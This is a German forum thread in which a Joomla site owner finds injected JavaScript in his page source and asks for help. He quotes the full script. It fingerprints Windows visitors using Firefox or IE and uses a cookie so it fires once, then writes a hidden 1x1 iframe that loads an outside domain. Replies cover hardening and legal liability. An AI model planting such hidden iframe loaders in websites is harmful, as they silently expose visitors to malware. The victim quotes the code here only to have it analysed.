Thema: Iframe Hausauto - Ist das ein Hack?

Meine Seite war kürzlich etwas zerschlagen.
Das Template war nicht mehr einwandfrei. Ich habe mir erst gedacht, dass es mein Fehler war, da ich zuvor einige Plugins zur Komprimierung von CSS und JS installiert hatte.
Dazwischen lag noch das Wochenende, sodass ich nicht mehr 100% rekonstruieren konnte was ich gemacht habe.

Dann ist mir aufgefallen, dass ich am Anfang meines Quellcodes folgenden Code stehen habe:

Code:

<script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> </iframe>

Mit der Domain hausauto.de konnte ich garnichts anfangen und war stutzig. Habe nach dem Iframe gegoogelt und festgestellt, dass es viele Seiten betrifft.
Wurde meine Seite gehackt, oder hab ich mir das selber installiert?
Weis zufällig jemand mit welcher Installation man sich diesen Code einfängt? Und kann jemand entziffern was es damit auf sich hat?

mit freundlichen Grüßen
Antti

Danke für die schnelle Antwort.
Leider keine gute Nachricht...

Lässt sich denn ungefähr sagen wie soetwas zustande kommt?

Muss zugeben, dass ich beim Thema .htaccess etwas auf durchzug schalte. Finde es wenig intuitiv zu handhaben.
Gibt es einen generellen Passwortschutz Code, den ich zur bestehenden .htacess Datei zufügen kann?

Danke
Antti

Ok war ne blöde Frage -

Kann man denn sagen was dieser Hack verursacht bzw. bezwecken soll?

Ich finde es schon interessant zu wissen was mit meiner Seite passieren kann.

Sehr wahrscheinlich ist nur das Template befallen, da ich die Meldung nicht mehr habe nachdem ich es gelöscht und neu installiert habe.
Habe die htaccess Einstellung von filgender Seite alle vorgenommen.
http://www.joomla-security.de/dateie...tellungen.html

Die Joomla Seite war vorher schon 1.5.25
Superadmin PW geändert
Alle bis auf einen FTP Account gelöscht
FTP PW geändert

Gibt es ein Tool zum checken?

Zitat von Orpheus2510

Du solltest dich lieber dafür interessieren, was mit dir passiert, wenn über deine Seite Schadcode verbreitet wird und kriminelle Machenschaften betrieben werden. Dafür darfst du nämlich juristisch haften und zahlen.

das blicken die meisten leider nicht, damit ist nicht zu spassen, ein kunde von mir hatte eine gehackte seite auf meinem server
dank einer unsicheren erweiterung, es wurden pishing mails verschickt

ich hatte die webseite dann gesperrt, der schaden wurde aber nur begrenzt, nach vielen telefonaten und mails, konnte
ich die bank of india davon abbringen regressansprueche zu stellen

also leute seit euch bewusst ihr lebt gefaehrlich, wenn die luecken nicht geschlossen werden

gruss ronny